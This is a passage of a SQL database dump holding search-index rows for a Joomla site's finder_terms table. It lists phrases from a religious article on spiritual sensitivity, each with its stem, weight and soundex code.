(325093, 'into hotel', 'into hotel', 0, 1, 1.3333, 'I534', 1, '*'),
(325094, 'into hotel business', 'into hotel business', 0, 1, 1.6333, 'I5341252', 1, '*'),
(325095, 'into the realm', 'into the realm', 0, 1, 1.4667, 'I53645', 1, '*'),
(325096, 'is alright', 'is alright', 0, 1, 1.3333, 'I24623', 1, '*'),
(325097, 'is alright for', 'is alright for', 0, 1, 1.4667, 'I2462316', 1, '*'),
(325098, 'is as it', 'is as it', 0, 1, 1.2667, 'I230', 1, '*'),
(325099, 'is available to', 'is available to', 0, 1, 1.5, 'I214143', 1, '*'),
(325100, 'is dense', 'is dense', 0, 1, 1.2667, 'I2352', 1, '*'),
(325101, 'is dense spiritually', 'is dense spiritually', 0, 1, 1.6667, 'I23521634', 1, '*'),
(325102, 'is formed', 'is formed', 0, 1, 1.3, 'I21653', 1, '*'),
(325103, 'is formed a', 'is formed a', 0, 1, 1.3667, 'I21653', 1, '*'),
(325104, 'is in this', 'is in this', 0, 1, 1.3333, 'I2532', 1, '*'),
(325105, 'is in yesterday', 'is in yesterday', 0, 1, 1.5, 'I252363', 1, '*'),
(325106, 'is low', 'is low', 0, 1, 1.2, 'I240', 2, '*'),
(325107, 'is low sensitivity', 'is low sensitivity', 0, 1, 1.6, 'I24252313', 1, '*'),
(325108, 'is not careful', 'is not careful', 0, 1, 1.4667, 'I2532614', 1, '*'),
(325109, 'is not safe', 'is not safe', 0, 1, 1.3667, 'I25321', 1, '*'),
(325110, 'is when', 'is when', 0, 1, 1.2333, 'I250', 1, '*'),
(325111, 'is when the', 'is when the', 0, 1, 1.3667, 'I253', 1, '*'),
(325112, 'it appears', 'it appears', 0, 1, 1.3333, 'I3162', 1, '*'),
(325113, 'it appears whether', 'it appears whether', 0, 1, 1.6, 'I316236', 1, '*'),
(325114, 'it can deaden', 'it can deaden', 0, 1, 1.4333, 'I32535', 1, '*'),
(325115, 'it doesn\'t sound', 'it doesn sound', 0, 1, 1.5333, 'I3253253', 1, '*'),
(325116, 'it makes', 'it makes', 0, 1, 1.2667, 'I352', 1, '*'),
(325117, 'it makes it', 'it makes it', 0, 1, 1.3667, 'I3523', 1, '*'),
(325118, 'it reduces', 'it reduces', 0, 1, 1.3333, 'I3632', 1, '*'),
(325119, 'it reduces your', 'it reduces your', 0, 1, 1.5, 'I36326', 1, '*'),
(325120, 'it that', 'it that', 0, 1, 1.2333, 'I300', 1, '*'),
(325121, 'it that is', 'it that is', 0, 1, 1.3333, 'I320', 1, '*'),
(325122, 'it\'s not just', 'it not just', 0, 1, 1.4333, 'I325323', 1, '*'),
(325123, 'item 61', 'item 61', 0, 1, 1.2333, 'I350', 1, '*'),
(325124, 'item 61 from', 'item 61 from', 0, 1, 1.4, 'I35165', 1, '*'),
(325125, 'jacob said', 'jacob said', 0, 1, 1.3333, 'J123', 1, '*'),
(325126, 'jacob said in', 'jacob said in', 0, 1, 1.4333, 'J1235', 1, '*'),
(325127, 'job people', 'job people', 0, 1, 1.3333, 'J140', 1, '*'),
(325128, 'job people may', 'job people may', 0, 1, 1.4667, 'J145', 1, '*'),
(325129, 'job that', 'job that', 0, 1, 1.2667, 'J130', 1, '*'),
(325130, 'job that is', 'job that is', 0, 1, 1.3667, 'J132', 1, '*'),
(325131, 'journey with', 'journei with', 0, 1, 1.4, 'J653', 1, '*'),
(325132, 'journey with the', 'journei with the', 0, 1, 1.5333, 'J653', 1, '*'),
(325133, 'just any', 'just any', 0, 1, 1.2667, 'J350', 1, '*'),
(325134, 'just any job', 'just any job', 0, 1, 1.4, 'J3521', 1, '*'),
(325135, 'k2 item 61', 'k2 item 61', 0, 1, 1.3333, 'K350', 1, '*'),
(325136, 'know it', 'know it', 0, 1, 1.2333, 'K530', 2, '*'),
(325137, 'know it that', 'know it that', 0, 1, 1.4, 'K530', 1, '*'),
(325138, 'know the right', 'know the right', 0, 1, 1.4667, 'K53623', 1, '*'),
(325139, 'last in', 'last in', 0, 1, 1.2333, 'L235', 1, '*'),
(325140, 'last in his', 'last in his', 0, 1, 1.3667, 'L2352', 1, '*'),
(325141, 'learn to yield', 'learn to yield', 0, 1, 1.4667, 'L65343', 1, '*'),
(325142, 'let him share', 'let him share', 0, 1, 1.4333, 'L3526', 1, '*'),
(325143, 'level of sensitivity', 'level of sensitivity', 0, 1, 1.6667, 'L141252313', 1, '*'),
(325144, 'levels of', 'level of', 0, 1, 1.3, 'L1421', 1, '*'),
(325145, 'levels of sensitivity', 'level of sensitivity', 0, 1, 1.7, 'L1421252313', 1, '*'),
(325146, 'life 5', 'life 5', 0, 1, 1.2, 'L100', 1, '*'),
(325147, 'life 5 stay', 'life 5 stay', 0, 1, 1.3667, 'L123', 1, '*'),
(325148, 'life highlighted', 'life highlighted', 0, 1, 1.5333, 'L12423', 1, '*'),
(325149, 'life highlighted below', 'life highlighted below', 0, 1, 1.7333, 'L1242314', 1, '*'),
(325150, 'life that is', 'life that is', 0, 1, 1.4, 'L132', 1, '*'),
(325151, 'life there are', 'life there are', 0, 1, 1.4667, 'L136', 1, '*'),
(325152, 'life to a', 'life to a', 0, 1, 1.3, 'L130', 1, '*'),
(325153, 'listen to a', 'listen to a', 0, 1, 1.3667, 'L2353', 1, '*'),
(325154, 'lord is in', 'lord is in', 0, 1, 1.3333, 'L6325', 1, '*'),
(325155, 'low', 'low', 0, 0, 0.2, 'L000', 2, '*'),
(325156, 'low and', 'low and', 0, 1, 1.2333, 'L530', 1, '*'),
(325157, 'low and no', 'low and no', 0, 1, 1.3333, 'L535', 1, '*'),
(325158, 'low sensitivity', 'low sensitivity', 0, 1, 1.5, 'L252313', 1, '*'),
(325159, 'low sensitivity 3', 'low sensitivity 3', 0, 1, 1.5667, 'L252313', 1, '*'),
(325160, 'low sensitivity jacob', 'low sensitivity jacob', 0, 1, 1.7, 'L25231321', 1, '*'),
(325161, 'lying', 'ly', 0, 0, 0.3333, 'L520', 1, '*'),
(325162, 'lying spirit', 'ly spirit', 0, 1, 1.4, 'L52163', 1, '*'),
(325163, 'lying spirit will', 'ly spirit will', 0, 1, 1.5667, 'L521634', 1, '*'),
(325164, 'maintain a', 'maintain a', 0, 1, 1.3333, 'M350', 1, '*'),
(325165, 'maintain a pure', 'maintain a pure', 0, 1, 1.5, 'M3516', 1, '*'),
(325166, 'makes it easy', 'make it easy', 0, 1, 1.4333, 'M232', 1, '*'),
(325167, 'man can get', 'man can get', 0, 1, 1.3667, 'M2523', 1, '*'),
(325168, 'man manifesting', 'man manifesting', 0, 1, 1.5, 'M12352', 1, '*'),
(325169, 'man manifesting the', 'man manifesting the', 0, 1, 1.6333, 'M123523', 1, '*'),
(325170, 'man with character', 'man with character', 0, 1, 1.6, 'M326236', 1, '*'),
(325171, 'man with gifts', 'man with gifts', 0, 1, 1.4667, 'M32132', 1, '*'),
(325172, 'manifesting', 'manifest', 0, 0, 0.7333, 'M12352', 1, '*'),
(325173, 'manifesting the', 'manifest the', 0, 1, 1.5, 'M123523', 1, '*'),
(325174, 'manifesting the gifts', 'manifest the gifts', 0, 1, 1.7, 'M1235232132', 1, '*'),
(325175, 'may need', 'mai need', 0, 1, 1.2667, 'M300', 2, '*'),
(325176, 'may need to', 'mai need to', 0, 1, 1.3667, 'M300', 1, '*'),
(325177, 'may wonder', 'mai wonder', 0, 1, 1.3333, 'M360', 1, '*'),
(325178, 'may wonder at', 'mai wonder at', 0, 1, 1.4333, 'M363', 1, '*'),
(325179, 'meals', 'meal', 0, 0, 0.3333, 'M420', 1, '*'),
(325180, 'meals sometimes', 'meal sometimes', 0, 1, 1.5, 'M425352', 1, '*'),
(325181, 'meals sometimes god', 'meal sometimes god', 0, 1, 1.6333, 'M4253523', 1, '*'),
(325182, 'message as', 'messag as', 0, 1, 1.3333, 'M200', 1, '*'),
(325183, 'message as you', 'messag as you', 0, 1, 1.4667, 'M200', 1, '*'),
(325184, 'military officer', 'militari officer', 0, 1, 1.5333, 'M436126', 1, '*'),
(325185, 'military officer a', 'militari officer a', 0, 1, 1.6, 'M436126', 1, '*'),
(325186, 'moody', 'moodi', 0, 0, 0.3333, 'M300', 1, '*'),
(325187, 'moody and', 'moodi and', 0, 1, 1.3, 'M353', 1, '*'),
(325188, 'moody and be', 'moodi and be', 0, 1, 1.4, 'M3531', 1, '*'),
(325189, 'more on', 'more on', 0, 1, 1.2333, 'M650', 1, '*'),
(325190, 'more on the', 'more on the', 0, 1, 1.3667, 'M653', 1, '*'),
(325191, 'most people', 'most people', 0, 1, 1.3667, 'M2314', 1, '*'),
(325192, 'most people that', 'most people that', 0, 1, 1.5333, 'M23143', 1, '*'),
(325193, 'need a', 'need a', 0, 1, 1.2, 'N300', 1, '*'),
(325194, 'need a high', 'need a high', 0, 1, 1.3667, 'N320', 1, '*'),
(325195, 'need high', 'need high', 0, 1, 1.3, 'N320', 1, '*'),
(325196, 'need high sensitivity', 'need high sensitivity', 0, 1, 1.7, 'N3252313', 1, '*'),
(325197, 'need sensitivity', 'need sensitivity', 0, 1, 1.5333, 'N3252313', 1, '*'),
(325198, 'need sensitivity to', 'need sensitivity to', 0, 1, 1.6333, 'N3252313', 1, '*'),
(325199, 'negative passion do', 'neg passion do', 0, 1, 1.6333, 'N231253', 1, '*'),
(325200, 'negative passion it', 'neg passion it', 0, 1, 1.6333, 'N231253', 1, '*'),
(325201, 'negative passion most', 'neg passion most', 0, 1, 1.7, 'N2312523', 1, '*'),
(325202, 'no character', 'no character', 0, 1, 1.4, 'N26236', 1, '*'),
(325203, 'no character 8', 'no character 8', 0, 1, 1.4667, 'N26236', 1, '*'),
(325204, 'no character is', 'no character is', 0, 1, 1.5, 'N262362', 1, '*'),
(325205, 'no sensitivity', 'no sensitivity', 0, 1, 1.4667, 'N252313', 1, '*'),
(325206, 'no sensitivity at', 'no sensitivity at', 0, 1, 1.5667, 'N252313', 1, '*'),
(325207, 'no sensitivity some', 'no sensitivity some', 0, 1, 1.6333, 'N25231325', 1, '*'),
(325208, 'normal life to', 'normal life to', 0, 1, 1.4667, 'N65413', 1, '*'),
(325209, 'normal sensitivity', 'normal sensitivity', 0, 1, 1.6, 'N654252313', 1, '*'),
(325210, 'normal sensitivity is', 'normal sensitivity is', 0, 1, 1.7, 'N6542523132', 1, '*'),
(325211, 'not careful', 'not careful', 0, 1, 1.3667, 'N32614', 1, '*'),
(325212, 'not careful 2', 'not careful 2', 0, 1, 1.4333, 'N32614', 1, '*'),
(325213, 'not come through', 'not come through', 0, 1, 1.5333, 'N325362', 1, '*'),
(325214, 'not have', 'not have', 0, 1, 1.2667, 'N310', 2, '*'),
(325215, 'not have the', 'not have the', 0, 1, 1.4, 'N313', 1, '*'),
(325216, 'not just any', 'not just any', 0, 1, 1.4, 'N3235', 1, '*'),
(325217, 'not know it', 'not know it', 0, 1, 1.3667, 'N3253', 1, '*'),
(325218, 'not last', 'not last', 0, 1, 1.2667, 'N3423', 1, '*'),
(325219, 'not last in', 'not last in', 0, 1, 1.3667, 'N34235', 1, '*'),
(325220, 'not safe', 'not safe', 0, 1, 1.2667, 'N321', 1, '*'),
(325221, 'not safe and', 'not safe and', 0, 1, 1.4, 'N32153', 1, '*'),
(325222, 'nothing is', 'noth is', 0, 1, 1.3333, 'N352', 1, '*'),
(325223, 'nothing is as', 'noth is as', 0, 1, 1.4333, 'N352', 1, '*'),
(325224, 'now god', 'now god', 0, 1, 1.2333, 'N230', 1, '*'),
(325225, 'now god is', 'now god is', 0, 1, 1.3333, 'N232', 1, '*'),
(325226, 'obedience to the', 'obedi to the', 0, 1, 1.5333, 'O13523', 1, '*'),
(325227, 'of abundance and', 'of abundance and', 0, 1, 1.5333, 'O1535253', 1, '*'),
(325228, 'of exceeding', 'of exceeding', 0, 1, 1.4, 'O12352', 1, '*'),
(325229, 'of exceeding abundantly', 'of exceeding abundantly', 0, 1, 1.7667, 'O12352153534', 1, '*'),
(325230, 'of god 4', 'of god 4', 0, 1, 1.2667, 'O123', 1, '*'),
(325231, 'of sensitivity', 'of sensitivity', 0, 1, 1.4667, 'O1252313', 1, '*'),
(325232, 'of sensitivity everything', 'of sensitivity everything', 0, 1, 1.8333, 'O125231316352', 1, '*'),
(325233, 'of sensitivity for', 'of sensitivity for', 0, 1, 1.6, 'O125231316', 1, '*'),
(325234, 'of sensitivity that', 'of sensitivity that', 0, 1, 1.6333, 'O1252313', 1, '*'),
(325235, 'of sensitivity two', 'of sensitivity two', 0, 1, 1.6, 'O1252313', 1, '*'),
(325236, 'of the steps', 'of the steps', 0, 1, 1.4, 'O132312', 1, '*'),
(325237, 'of these four', 'of these four', 0, 1, 1.4333, 'O13216', 1, '*'),
(325238, 'of tv', 'of tv', 0, 1, 1.1667, 'O131', 1, '*'),
(325239, 'of tv practiceputting', 'of tv practiceputting', 0, 1, 1.7, 'O13162321352', 1, '*'),
(325240, 'officer', 'offic', 0, 0, 0.4667, 'O126', 1, '*'),
(325241, 'officer a', 'offic a', 0, 1, 1.3, 'O126', 1, '*'),
(325242, 'officer a senior', 'offic a senior', 0, 1, 1.5333, 'O126256', 1, '*'),
(325243, 'officer etc', 'offic etc', 0, 1, 1.3667, 'O12632', 1, '*'),
(325244, 'officer etc you', 'offic etc you', 0, 1, 1.5, 'O12632', 1, '*'),
(325245, 'or bad', 'or bad', 0, 1, 1.2, 'O613', 1, '*'),
(325246, 'or bad you', 'or bad you', 0, 1, 1.3333, 'O613', 1, '*'),
(325247, 'or listen', 'or listen', 0, 1, 1.3, 'O64235', 1, '*'),
(325248, 'or listen to', 'or listen to', 0, 1, 1.4, 'O642353', 1, '*'),
(325249, 'out of these', 'out of these', 0, 1, 1.4, 'O3132', 1, '*'),
(325250, 'passion do', 'passion do', 0, 1, 1.3333, 'P253', 1, '*'),
(325251, 'passion do not', 'passion do not', 0, 1, 1.4667, 'P25353', 1, '*'),
(325252, 'passion it', 'passion it', 0, 1, 1.3333, 'P253', 1, '*'),
(325253, 'passion it reduces', 'passion it reduces', 0, 1, 1.6, 'P253632', 1, '*'),
(325254, 'passion most', 'passion most', 0, 1, 1.4, 'P2523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(325255, 'passion most people', 'passion most people', 0, 1, 1.6333, 'P252314', 1, '*'),
(325256, 'passions 9', 'passion 9', 0, 1, 1.3333, 'P252', 1, '*'),
(325257, 'passions 9 avoid', 'passion 9 avoid', 0, 1, 1.5333, 'P25213', 1, '*'),
(325258, 'people are working', 'peopl are working', 0, 1, 1.6, 'P46252', 1, '*'),
(325259, 'people may', 'peopl may', 0, 1, 1.3333, 'P450', 1, '*'),
(325260, 'people may wonder', 'peopl may wonder', 0, 1, 1.5667, 'P4536', 1, '*'),
(325261, 'people that yield', 'peopl that yield', 0, 1, 1.5667, 'P4343', 1, '*'),
(325262, 'person is', 'person is', 0, 1, 1.3, 'P6252', 2, '*'),
(325263, 'person is dense', 'person is dense', 0, 1, 1.5, 'P6252352', 1, '*'),
(325264, 'place and i', 'place and i', 0, 1, 1.3667, 'P4253', 1, '*'),
(325265, 'place character', 'place character', 0, 1, 1.5, 'P426236', 1, '*'),
(325266, 'place character is', 'place character is', 0, 1, 1.6, 'P4262362', 1, '*'),
(325267, 'place if', 'place if', 0, 1, 1.2667, 'P421', 1, '*'),
(325268, 'place if he', 'place if he', 0, 1, 1.3667, 'P421', 1, '*'),
(325269, 'place that', 'place that', 0, 1, 1.3333, 'P423', 1, '*'),
(325270, 'place that the', 'place that the', 0, 1, 1.4667, 'P423', 1, '*'),
(325271, 'play or', 'plai or', 0, 1, 1.2333, 'P460', 1, '*'),
(325272, 'play or listen', 'plai or listen', 0, 1, 1.4667, 'P464235', 1, '*'),
(325273, 'police', 'polic', 0, 0, 0.4, 'P420', 1, '*'),
(325274, 'police officer', 'polic officer', 0, 1, 1.4667, 'P42126', 1, '*'),
(325275, 'police officer etc', 'polic officer etc', 0, 1, 1.6, 'P4212632', 1, '*'),
(325276, 'positive passions', 'posit passions', 0, 1, 1.5667, 'P231252', 1, '*'),
(325277, 'positive passions 9', 'posit passions 9', 0, 1, 1.6333, 'P231252', 1, '*'),
(325278, 'practiceputting', 'practiceput', 0, 0, 1, 'P62321352', 1, '*'),
(325279, 'practiceputting worship', 'practiceput worship', 0, 1, 1.7667, 'P62321352621', 1, '*'),
(325280, 'practiceputting worship songs', 'practiceput worship songs', 0, 1, 1.9667, 'P62321352621252', 1, '*'),
(325281, 'practise', 'practis', 0, 0, 0.5333, 'P6232', 1, '*'),
(325282, 'practise instant', 'practis instant', 0, 1, 1.5333, 'P623252353', 1, '*'),
(325283, 'practise instant obedience', 'practis instant obedience', 0, 1, 1.8667, 'P6232523531352', 1, '*'),
(325284, 'pray for yourself', 'prai for yourself', 0, 1, 1.5667, 'P616241', 1, '*'),
(325285, 'pure conscience', 'pure conscience', 0, 1, 1.5, 'P625252', 1, '*'),
(325286, 'pure conscience 2', 'pure conscience 2', 0, 1, 1.5667, 'P625252', 1, '*'),
(325287, 'realm it', 'realm it', 0, 1, 1.2667, 'R453', 1, '*'),
(325288, 'realm it makes', 'realm it makes', 0, 1, 1.4667, 'R45352', 1, '*'),
(325289, 'realm nothing', 'realm nothing', 0, 1, 1.4333, 'R45352', 1, '*'),
(325290, 'realm nothing is', 'realm nothing is', 0, 1, 1.5333, 'R45352', 1, '*'),
(325291, 'realm of exceeding', 'realm of exceeding', 0, 1, 1.6, 'R4512352', 1, '*'),
(325292, 'reduces', 'reduc', 0, 0, 0.4667, 'R320', 2, '*'),
(325293, 'reduces your', 'reduc your', 0, 1, 1.4, 'R326', 1, '*'),
(325294, 'reduces your sensitivity', 'reduc your sensitivity', 0, 1, 1.8, 'R326252313', 1, '*'),
(325295, 'regularly fasting', 'regularli fasting', 0, 1, 1.5667, 'R246412352', 1, '*'),
(325296, 'regularly fasting enhances', 'regularli fasting enhances', 0, 1, 1.8667, 'R24641235252', 1, '*'),
(325297, 'require a', 'requir a', 0, 1, 1.3, 'R260', 2, '*'),
(325298, 'require a high', 'requir a high', 0, 1, 1.4667, 'R262', 1, '*'),
(325299, 'right job', 'right job', 0, 1, 1.3, 'R2321', 1, '*'),
(325300, 'right job people', 'right job people', 0, 1, 1.5333, 'R23214', 1, '*'),
(325301, 'rubbing', 'rub', 0, 0, 0.4667, 'R152', 1, '*'),
(325302, 'rubbing spirit', 'rub spirit', 0, 1, 1.4667, 'R152163', 1, '*'),
(325303, 'rubbing spirit with', 'rub spirit with', 0, 1, 1.6333, 'R152163', 1, '*'),
(325304, 'safe and', 'safe and', 0, 1, 1.2667, 'S153', 1, '*'),
(325305, 'safe and he', 'safe and he', 0, 1, 1.3667, 'S153', 1, '*'),
(325306, 'said in genesis', 'said in genesis', 0, 1, 1.5, 'S35252', 1, '*'),
(325307, 'senior', 'senior', 0, 0, 0.4, 'S560', 1, '*'),
(325308, 'senior military', 'senior military', 0, 1, 1.5, 'S565436', 1, '*'),
(325309, 'senior military officer', 'senior military officer', 0, 1, 1.7667, 'S565436126', 1, '*'),
(325310, 'senior police', 'senior police', 0, 1, 1.4333, 'S56142', 1, '*'),
(325311, 'senior police officer', 'senior police officer', 0, 1, 1.7, 'S56142126', 1, '*'),
(325312, 'sensitive 4', 'sensit 4', 0, 1, 1.3667, 'S5231', 1, '*'),
(325313, 'sensitive 4 high', 'sensit 4 high', 0, 1, 1.5333, 'S52312', 1, '*'),
(325314, 'sensitive to', 'sensit to', 0, 1, 1.4, 'S52313', 1, '*'),
(325315, 'sensitive to the', 'sensit to the', 0, 1, 1.5333, 'S52313', 1, '*'),
(325316, 'sensitivity 3', 'sensit 3', 0, 1, 1.4333, 'S52313', 1, '*'),
(325317, 'sensitivity 3 sensitive', 'sensit 3 sensitive', 0, 1, 1.7667, 'S5231325231', 1, '*'),
(325318, 'sensitivity at', 'sensit at', 0, 1, 1.4667, 'S52313', 1, '*'),
(325319, 'sensitivity at all', 'sensit at all', 0, 1, 1.6, 'S523134', 1, '*'),
(325320, 'sensitivity everything', 'sensit everything', 0, 1, 1.7333, 'S5231316352', 1, '*'),
(325321, 'sensitivity everything that', 'sensit everything that', 0, 1, 1.9, 'S52313163523', 1, '*'),
(325322, 'sensitivity for', 'sensit for', 0, 1, 1.5, 'S5231316', 1, '*'),
(325323, 'sensitivity for them', 'sensit for them', 0, 1, 1.6667, 'S523131635', 1, '*'),
(325324, 'sensitivity for you', 'sensit for you', 0, 1, 1.6333, 'S5231316', 1, '*'),
(325325, 'sensitivity guiding', 'sensit guiding', 0, 1, 1.6333, 'S523132352', 1, '*'),
(325326, 'sensitivity guiding him', 'sensit guiding him', 0, 1, 1.7667, 'S5231323525', 1, '*'),
(325327, 'sensitivity is', 'sensit is', 0, 1, 1.4667, 'S523132', 1, '*'),
(325328, 'sensitivity is what', 'sensit is what', 0, 1, 1.6333, 'S5231323', 1, '*'),
(325329, 'sensitivity it\'s', 'sensit it', 0, 1, 1.5333, 'S523132', 1, '*'),
(325330, 'sensitivity it\'s not', 'sensit it not', 0, 1, 1.6667, 'S52313253', 1, '*'),
(325331, 'sensitivity jacob', 'sensit jacob', 0, 1, 1.5667, 'S5231321', 1, '*'),
(325332, 'sensitivity jacob said', 'sensit jacob said', 0, 1, 1.7333, 'S523132123', 1, '*'),
(325333, 'sensitivity out', 'sensit out', 0, 1, 1.5, 'S52313', 1, '*'),
(325334, 'sensitivity out of', 'sensit out of', 0, 1, 1.6, 'S523131', 1, '*'),
(325335, 'sensitivity pray', 'sensit pray', 0, 1, 1.5333, 'S5231316', 1, '*'),
(325336, 'sensitivity pray for', 'sensit pray for', 0, 1, 1.6667, 'S523131616', 1, '*'),
(325337, 'sensitivity some', 'sensit some', 0, 1, 1.5333, 'S5231325', 1, '*'),
(325338, 'sensitivity some people', 'sensit some people', 0, 1, 1.7667, 'S523132514', 1, '*'),
(325339, 'sensitivity that', 'sensit that', 0, 1, 1.5333, 'S52313', 1, '*'),
(325340, 'sensitivity that is', 'sensit that is', 0, 1, 1.6333, 'S523132', 1, '*'),
(325341, 'sensitivity till', 'sensit till', 0, 1, 1.5333, 'S523134', 1, '*'),
(325342, 'sensitivity till next', 'sensit till next', 0, 1, 1.7, 'S523134523', 1, '*'),
(325343, 'sensitivity to know', 'sensit to know', 0, 1, 1.6333, 'S5231325', 1, '*'),
(325344, 'sensitivity to the', 'sensit to the', 0, 1, 1.6, 'S52313', 1, '*'),
(325345, 'sensitivity two', 'sensit two', 0, 1, 1.5, 'S52313', 1, '*'),
(325346, 'sensitivity two are', 'sensit two are', 0, 1, 1.6333, 'S523136', 1, '*'),
(325347, 'share that with', 'share that with', 0, 1, 1.5, 'S630', 1, '*'),
(325348, 'sharpened', 'sharpen', 0, 0, 0.6, 'S6153', 1, '*'),
(325349, 'sharpened 7', 'sharpen 7', 0, 1, 1.3667, 'S6153', 1, '*'),
(325350, 'sharpened 7 allow', 'sharpen 7 allow', 0, 1, 1.5667, 'S61534', 1, '*'),
(325351, 'signals disobedience', 'signal disobedience', 0, 1, 1.6667, 'S542321352', 1, '*'),
(325352, 'signals disobedience to', 'signal disobedience to', 0, 1, 1.7667, 'S5423213523', 1, '*'),
(325353, 'some people are', 'some people are', 0, 1, 1.5, 'S5146', 1, '*'),
(325354, 'sometimes god', 'sometim god', 0, 1, 1.4333, 'S53523', 1, '*'),
(325355, 'sometimes god lives', 'sometim god lives', 0, 1, 1.6333, 'S53523412', 1, '*'),
(325356, 'somewhere giving', 'somewher giving', 0, 1, 1.5333, 'S562152', 1, '*'),
(325357, 'somewhere giving heed', 'somewher giving heed', 0, 1, 1.7, 'S5621523', 1, '*'),
(325358, 'songs', 'song', 0, 0, 0.3333, 'S520', 1, '*'),
(325359, 'songs to', 'song to', 0, 1, 1.2667, 'S523', 1, '*'),
(325360, 'songs to play', 'song to play', 0, 1, 1.4333, 'S52314', 1, '*'),
(325361, 'sound normal', 'sound normal', 0, 1, 1.4, 'S535654', 1, '*'),
(325362, 'sound normal sensitivity', 'sound normal sensitivity', 0, 1, 1.8, 'S535654252313', 1, '*'),
(325363, 'spirit 1 maintain', 'spirit 1 maintain', 0, 1, 1.5667, 'S163535', 1, '*'),
(325364, 'spirit avoid', 'spirit avoid', 0, 1, 1.4, 'S16313', 1, '*'),
(325365, 'spirit avoid falling', 'spirit avoid falling', 0, 1, 1.6667, 'S163131452', 1, '*'),
(325366, 'spirit god', 'spirit god', 0, 1, 1.3333, 'S16323', 1, '*'),
(325367, 'spirit god is', 'spirit god is', 0, 1, 1.4333, 'S163232', 1, '*'),
(325368, 'spirit is one', 'spirit is one', 0, 1, 1.4333, 'S16325', 1, '*'),
(325369, 'spirit realm it', 'spirit realm it', 0, 1, 1.5, 'S1636453', 1, '*'),
(325370, 'spirit realm nothing', 'spirit realm nothing', 0, 1, 1.6667, 'S163645352', 1, '*'),
(325371, 'spirit this will', 'spirit this will', 0, 1, 1.5333, 'S16324', 1, '*'),
(325372, 'spirit to work', 'spirit to work', 0, 1, 1.4667, 'S16362', 1, '*'),
(325373, 'spirit will embarrass', 'spirit will embarrass', 0, 1, 1.7, 'S16345162', 1, '*'),
(325374, 'spirit will weaken', 'spirit will weaken', 0, 1, 1.6, 'S163425', 1, '*'),
(325375, 'spirit with dead', 'spirit with dead', 0, 1, 1.5333, 'S163', 1, '*'),
(325376, 'spirit with no', 'spirit with no', 0, 1, 1.4667, 'S1635', 1, '*'),
(325377, 'spirit you can\'t', 'spirit you can', 0, 1, 1.5333, 'S163253', 1, '*'),
(325378, 'spirit you cannot', 'spirit you cannot', 0, 1, 1.5667, 'S163253', 1, '*'),
(325379, 'spirits and', 'spirit and', 0, 1, 1.3667, 'S163253', 1, '*'),
(325380, 'spirits and except', 'spirit and except', 0, 1, 1.6, 'S163253213', 1, '*'),
(325381, 'spiritually a', 'spiritu a', 0, 1, 1.4333, 'S1634', 1, '*'),
(325382, 'spiritually a born', 'spiritu a born', 0, 1, 1.6, 'S1634165', 1, '*'),
(325383, 'steps to enhancing', 'step to enhancing', 0, 1, 1.6, 'S31235252', 1, '*'),
(325384, 'stress-free', 'stress-fre', 0, 0, 0.7333, 'S36216', 1, '*'),
(325385, 'stress-free life', 'stress-fre life', 0, 1, 1.5333, 'S3621641', 1, '*'),
(325386, 'stress-free life 5', 'stress-fre life 5', 0, 1, 1.6, 'S3621641', 1, '*'),
(325387, 'struggle but', 'struggl but', 0, 1, 1.4, 'S362413', 1, '*'),
(325388, 'struggle but through', 'struggl but through', 0, 1, 1.6667, 'S36241362', 1, '*'),
(325389, 'surely the', 'sure the', 0, 1, 1.3333, 'S643', 1, '*'),
(325390, 'surely the lord', 'sure the lord', 0, 1, 1.5, 'S643463', 1, '*'),
(325391, 'survive if', 'surviv if', 0, 1, 1.3333, 'S610', 1, '*'),
(325392, 'survive if you', 'surviv if you', 0, 1, 1.4667, 'S610', 1, '*'),
(325393, 'tell you what', 'tell you what', 0, 1, 1.4333, 'T430', 1, '*'),
(325394, 'than a man', 'than a man', 0, 1, 1.3333, 'T500', 1, '*'),
(325395, 'that all things', 'that all things', 0, 1, 1.5, 'T4352', 1, '*'),
(325396, 'that could be', 'that could be', 0, 1, 1.4333, 'T2431', 1, '*'),
(325397, 'that is alright', 'that is alright', 0, 1, 1.5, 'T24623', 1, '*'),
(325398, 'that is low', 'that is low', 0, 1, 1.3667, 'T240', 1, '*'),
(325399, 'that place if', 'that place if', 0, 1, 1.4333, 'T1421', 1, '*'),
(325400, 'that the winds', 'that the winds', 0, 1, 1.4667, 'T532', 1, '*'),
(325401, 'that will guarantee', 'that will guarantee', 0, 1, 1.6333, 'T42653', 1, '*'),
(325402, 'that with', 'that with', 0, 1, 1.3, 'T000', 1, '*'),
(325403, 'that with you', 'that with you', 0, 1, 1.4333, 'T000', 1, '*'),
(325404, 'that yield', 'that yield', 0, 1, 1.3333, 'T430', 1, '*'),
(325405, 'that yield to', 'that yield to', 0, 1, 1.4333, 'T430', 1, '*'),
(325406, 'the danger there', 'the danger there', 0, 1, 1.5333, 'T52636', 1, '*'),
(325407, 'the flow', 'the flow', 0, 1, 1.2667, 'T140', 1, '*'),
(325408, 'the flow learn', 'the flow learn', 0, 1, 1.4667, 'T1465', 1, '*'),
(325409, 'the gospel you', 'the gospel you', 0, 1, 1.4667, 'T214', 1, '*'),
(325410, 'the person is', 'the person is', 0, 1, 1.4333, 'T16252', 1, '*'),
(325411, 'the place character', 'the place character', 0, 1, 1.6333, 'T1426236', 1, '*'),
(325412, 'the right job', 'the right job', 0, 1, 1.4333, 'T62321', 1, '*'),
(325413, 'the spirit with', 'the spirit with', 0, 1, 1.5, 'T2163', 1, '*'),
(325414, 'the ways to', 'the ways to', 0, 1, 1.3667, 'T230', 1, '*'),
(325415, 'the winds', 'the winds', 0, 1, 1.3, 'T532', 1, '*'),
(325416, 'the winds and', 'the winds and', 0, 1, 1.4333, 'T53253', 1, '*'),
(325417, 'them to survive', 'them to survive', 0, 1, 1.5, 'T53261', 1, '*'),
(325418, 'there are four', 'there are four', 0, 1, 1.4667, 'T616', 1, '*'),
(325419, 'there require', 'there require', 0, 1, 1.4333, 'T626', 1, '*'),
(325420, 'there require a', 'there require a', 0, 1, 1.5, 'T626', 1, '*'),
(325421, 'these four', 'these four', 0, 1, 1.3333, 'T216', 1, '*'),
(325422, 'these four levels', 'these four levels', 0, 1, 1.5667, 'T2164142', 1, '*'),
(325423, 'things are now', 'thing are now', 0, 1, 1.4667, 'T5265', 1, '*'),
(325424, 'this is when', 'thi is when', 0, 1, 1.4, 'T250', 1, '*'),
(325425, 'this place', 'thi place', 0, 1, 1.3333, 'T2142', 1, '*'),
(325426, 'this place and', 'thi place and', 0, 1, 1.4667, 'T214253', 1, '*'),
